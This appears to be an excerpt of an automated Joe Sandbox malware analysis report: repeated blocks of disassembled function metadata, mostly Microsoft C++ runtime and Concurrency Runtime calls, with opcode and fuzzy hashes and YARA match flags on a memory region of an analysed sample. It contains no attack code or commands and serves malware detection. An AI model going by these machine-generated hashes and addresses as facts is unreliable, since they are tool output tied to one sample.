                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 78362717-0
                                                                                                                                                                                                                              • Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                                                                                                                                                              • Instruction ID: ba6f451568feed0ad97d4c35bc03da7052fef1102373e57c37541bd94dea7e10
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DD01F236700224A7CF16AE5AA811AFFB7A99F80354F41005BFC11A7282DE24FD2192A8
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 007A639F
                                                                                                                                                                                                                              • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 007A63B3
                                                                                                                                                                                                                              • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 007A63CB
                                                                                                                                                                                                                              • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 007A63E3
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 78362717-0
                                                                                                                                                                                                                              • Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                                                                                                                                                              • Instruction ID: 4b0ab08bef65b25ff8a555efa379eb76d2cc2c20ff35ba01c92a82df5cfe2101
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4A014932600124F7CF11EE69D845EEF7799EFD7310F080615FD11AB282DAB4ED0292A1
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • Concurrency::location::_Assign.LIBCMT ref: 007A2BA1
                                                                                                                                                                                                                              • Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 007A2BBF
                                                                                                                                                                                                                                • Part of subcall function 00798677: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 00798698
                                                                                                                                                                                                                                • Part of subcall function 00798677: Hash.LIBCMT ref: 007986D8
                                                                                                                                                                                                                              • Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 007A2BC8
                                                                                                                                                                                                                              • Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 007A2BE8
                                                                                                                                                                                                                                • Part of subcall function 0079F6CF: Hash.LIBCMT ref: 0079F6E1
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2250070497-0
                                                                                                                                                                                                                              • Opcode ID: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
                                                                                                                                                                                                                              • Instruction ID: af565febd75c3e6bc9a72d20e9663073a3b74d4c395200b9002b181ab3a43072
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B0118E76500600EFC715EFA4C8859CAFBF8BF59320F004A1EE55687192EB74F904CBA0
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • Concurrency::location::_Assign.LIBCMT ref: 007A2BA1
                                                                                                                                                                                                                              • Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 007A2BBF
                                                                                                                                                                                                                                • Part of subcall function 00798677: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 00798698
                                                                                                                                                                                                                                • Part of subcall function 00798677: Hash.LIBCMT ref: 007986D8
                                                                                                                                                                                                                              • Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 007A2BC8
                                                                                                                                                                                                                              • Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 007A2BE8
                                                                                                                                                                                                                                • Part of subcall function 0079F6CF: Hash.LIBCMT ref: 0079F6E1
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2250070497-0
                                                                                                                                                                                                                              • Opcode ID: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
                                                                                                                                                                                                                              • Instruction ID: c35d0942f5d1feafcb2cf884d742d2097b349e34667054cda6c213763f61112d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E8011B76500604EBC714EFA9D885DDAF7E8BF59310B008A1EE55687152DB74F944CBA0
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog3_GS.LIBCMT ref: 0040591C
                                                                                                                                                                                                                                • Part of subcall function 0040BB3D: __EH_prolog3_GS.LIBCMT ref: 0040BB44
                                                                                                                                                                                                                              • std::_Locinfo::_Locinfo.LIBCPMT ref: 00405967
                                                                                                                                                                                                                              • __Getcoll.LIBCPMT ref: 00405976
                                                                                                                                                                                                                              • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00405986
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1836011271-0
                                                                                                                                                                                                                              • Opcode ID: b945d4fba948faf335eba6a26c9d16208f5764ada45908dbcbdd3d34a3e84dcb
                                                                                                                                                                                                                              • Instruction ID: 7de8e0425e838f52bf763386e227ca4e4c8dd97e461cbe55c35c0d0d082d521b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b945d4fba948faf335eba6a26c9d16208f5764ada45908dbcbdd3d34a3e84dcb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 61011771910209DFDB10EFA5C486B9DB7B0EF04329F10843EE459BB681DB789549CF99
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog3_GS.LIBCMT ref: 007850C7
                                                                                                                                                                                                                                • Part of subcall function 0078BDA4: __EH_prolog3_GS.LIBCMT ref: 0078BDAB
                                                                                                                                                                                                                              • std::_Locinfo::_Locinfo.LIBCPMT ref: 00785112
                                                                                                                                                                                                                              • __Getcoll.LIBCPMT ref: 00785121
                                                                                                                                                                                                                              • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00785131
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1836011271-0
                                                                                                                                                                                                                              • Opcode ID: aff552bf37bfddc61d9e477734a816809d81299120f6a55e324a792514706cbd
                                                                                                                                                                                                                              • Instruction ID: 996fd906df6fac351eca5707288d9641a3d27c5edbae91dcd9184b88a4bbed5e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aff552bf37bfddc61d9e477734a816809d81299120f6a55e324a792514706cbd
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2D012571D91608DFEB14FFA8D499B9DBBB0BF44311F108129E059AB282DB7C9944CBA1
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog3_GS.LIBCMT ref: 00785B83
                                                                                                                                                                                                                                • Part of subcall function 0078BDA4: __EH_prolog3_GS.LIBCMT ref: 0078BDAB
                                                                                                                                                                                                                              • std::_Locinfo::_Locinfo.LIBCPMT ref: 00785BCE
                                                                                                                                                                                                                              • __Getcoll.LIBCPMT ref: 00785BDD
                                                                                                                                                                                                                              • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00785BED
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1836011271-0
                                                                                                                                                                                                                              • Opcode ID: ed65b9f5cd0855bdbf339c1b5aedfa909ef6e81665b606bc02af1812e3ab0e20
                                                                                                                                                                                                                              • Instruction ID: 7917b4fde0ada3fb81292d09dad9284af27a33f45d6d491cde0f81617183a4a7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ed65b9f5cd0855bdbf339c1b5aedfa909ef6e81665b606bc02af1812e3ab0e20
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 82014C71990209DFEB04FFA4D449B9DBBB0BF54311F108029E009AB282DBBC9944CBA1
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BEF9
                                                                                                                                                                                                                              • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF09
                                                                                                                                                                                                                              • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF19
                                                                                                                                                                                                                              • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF2D
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Compare_exchange_acquire_4std::_
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3973403980-0
                                                                                                                                                                                                                              • Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                                                                                                                                                              • Instruction ID: 54cf5004022dc03f320fac5c152f4f5b0e5638c7bf5de93af177e0e0418c077f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1901FB3744418DBBDF119E64DD428EE3B66EF08354B148516F918C4235C336CAB2EF89
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0079C160
                                                                                                                                                                                                                              • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0079C170
                                                                                                                                                                                                                              • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0079C180
                                                                                                                                                                                                                              • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0079C194
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Compare_exchange_acquire_4std::_
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3973403980-0
                                                                                                                                                                                                                              • Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                                                                                                                                                              • Instruction ID: d678b4ce655e862826e7da4cc22d0c36b9da7d39e1824df50e2f7d8dc2a317b7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CC01F6BA04414DFBCF239F94FD128BD3B66AB15350F148421F91888172D336CA70AB96
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 004110CB
                                                                                                                                                                                                                                • Part of subcall function 0041093D: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0041095F
                                                                                                                                                                                                                                • Part of subcall function 0041093D: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 00410980
                                                                                                                                                                                                                              • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 004110DE
                                                                                                                                                                                                                              • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 004110EA
                                                                                                                                                                                                                              • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 004110F3
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4284812201-0
                                                                                                                                                                                                                              • Opcode ID: 59b962ce0df35001d24a788376b82219d2b26174a8e6e3787add2960edfe3223
                                                                                                                                                                                                                              • Instruction ID: f673f10ca75d55ca35707f3ec936348daa0dfd556a05ba3ac72040e7cf752ef9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 59b962ce0df35001d24a788376b82219d2b26174a8e6e3787add2960edfe3223
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2EF02470A002046BDF347BB648525EE35954F85318F04403FBA12AB7D1DEBC9DC6939D
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 00413515
                                                                                                                                                                                                                                • Part of subcall function 0041289F: ___crtGetTimeFormatEx.LIBCMT ref: 004128B5
                                                                                                                                                                                                                                • Part of subcall function 0041289F: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 004128D4
                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00413531
                                                                                                                                                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00413547
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00413555
                                                                                                                                                                                                                                • Part of subcall function 00412675: SetThreadPriority.KERNEL32(?,?), ref: 00412681
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1674182817-0
                                                                                                                                                                                                                              • Opcode ID: 3fadc1366d0a75540ac8f783509af273c6311a84a5b4fac4ceb4b62defc82512
                                                                                                                                                                                                                              • Instruction ID: 0599dc728a4d66ec5529e5430020c2b67b59d3184165c4d7970fdf63fa2ec416
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3fadc1366d0a75540ac8f783509af273c6311a84a5b4fac4ceb4b62defc82512
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6AF08271A002253AD724BA765D07FFB369C9B01B54F90095BB905E6186F9ECD99042AC
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 00791332
                                                                                                                                                                                                                                • Part of subcall function 00790BA4: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00790BC6
                                                                                                                                                                                                                                • Part of subcall function 00790BA4: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 00790BE7
                                                                                                                                                                                                                              • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 00791345
                                                                                                                                                                                                                              • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 00791351
                                                                                                                                                                                                                              • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 0079135A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4284812201-0
                                                                                                                                                                                                                              • Opcode ID: fab2751c85c2460bc8d3eb096a8fe9c9e671c40a46efb78719edf7368fe23de1
                                                                                                                                                                                                                              • Instruction ID: b3188070ce7f93406ebe0d60129b6a1920c05d9c3c65989aa298f63c95862481
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fab2751c85c2460bc8d3eb096a8fe9c9e671c40a46efb78719edf7368fe23de1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B4F0B471750306EB9F247BB4686A5BD22A65F81310B844139F6115B3C1DE7C8E1193E4
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 0079377C
                                                                                                                                                                                                                                • Part of subcall function 00792B06: ___crtGetTimeFormatEx.LIBCMT ref: 00792B1C
                                                                                                                                                                                                                                • Part of subcall function 00792B06: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 00792B3B
                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00793798
                                                                                                                                                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 007937AE
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 007937BC
                                                                                                                                                                                                                                • Part of subcall function 007928DC: SetThreadPriority.KERNEL32(?,?), ref: 007928E8
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1674182817-0
                                                                                                                                                                                                                              • Opcode ID: 3fadc1366d0a75540ac8f783509af273c6311a84a5b4fac4ceb4b62defc82512
                                                                                                                                                                                                                              • Instruction ID: 8508eb20b95bc555d8390529e250d75299603e35c5cec424e203ee9a6a77c78f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3fadc1366d0a75540ac8f783509af273c6311a84a5b4fac4ceb4b62defc82512
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CFF0A7F294031579EB20B7756C4FFBB369C9B01750F500926B915E7086FD9DD80583B9
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0079D078
                                                                                                                                                                                                                              • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0079D09C
                                                                                                                                                                                                                              • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0079D0AF
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0079D0BD
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3657713681-0
                                                                                                                                                                                                                              • Opcode ID: 91fe00c27762651b251d8766a9fdc76cd8d1da8bd6571df67899734432931397
                                                                                                                                                                                                                              • Instruction ID: c5d6e6d2cd999648dbd84495c19d83726e1c2bf043eedb0a85400c903877c664
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 91fe00c27762651b251d8766a9fdc76cd8d1da8bd6571df67899734432931397
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9FF0E935900604E7CF34FB58F84AD6EB77A9ED0B10B70812AE40517182EF7DAD4AC7A2
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RegisterWaitForSingleObject.KERNEL32(?,00000000,00423582,000000A4,000000FF,0000000C), ref: 004125F8
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,004185B9,?,?,?,?,00000000,?,00000000), ref: 00412607
                                                                                                                                                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041261D
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0041262B
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3803302727-0
                                                                                                                                                                                                                              • Opcode ID: c7576253412bed51a53af5acb8f859d20b769276d3a1e4e3fae42923a132b8bd
                                                                                                                                                                                                                              • Instruction ID: 32cc1d4aaffc7e2d0c3ec5972b7dcb87793a3d4e5e2b79d3cb8e63f4c665dc5c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c7576253412bed51a53af5acb8f859d20b769276d3a1e4e3fae42923a132b8bd
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2BF0A03460010ABBCF00EFA5DE45EEF37A86B00705F600616B611E20E1DBB8EA54976C
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RegisterWaitForSingleObject.KERNEL32(?,00000000,00423582,000000A4,000000FF,0000000C), ref: 0079285F
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,00798820,?,?,?,?,00000000,?,00000000), ref: 0079286E
                                                                                                                                                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00792884
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00792892
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3803302727-0
                                                                                                                                                                                                                              • Opcode ID: c7576253412bed51a53af5acb8f859d20b769276d3a1e4e3fae42923a132b8bd
                                                                                                                                                                                                                              • Instruction ID: 710d39260834be6e992f170ad0e36b7b62ac9928060317f4b0bc1cd269907bb9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c7576253412bed51a53af5acb8f859d20b769276d3a1e4e3fae42923a132b8bd
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A9F0653590020AFBCF10FFA5DD49EAF37787B00B11F600665B515E60E2DB79DA0497A9
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • std::_Cnd_initX.LIBCPMT ref: 00785A79
                                                                                                                                                                                                                              • __Cnd_signal.LIBCPMT ref: 00785A85
                                                                                                                                                                                                                              • std::_Cnd_initX.LIBCPMT ref: 00785A9A
                                                                                                                                                                                                                              • __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 00785AA1
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2059591211-0
                                                                                                                                                                                                                              • Opcode ID: 7b268af305ad7e70588f0d2166d3aa4120e27ad18746cc38b88b58263b6b4356
                                                                                                                                                                                                                              • Instruction ID: f555404e472e6978e99c3e9569fe7f55f86843b73d8272f112184bf985edc208
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7b268af305ad7e70588f0d2166d3aa4120e27ad18746cc38b88b58263b6b4356
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 80F0A032080701DBEB317771D80F72A7BA0AF01321F144828F055569D2CFBEA8458B65
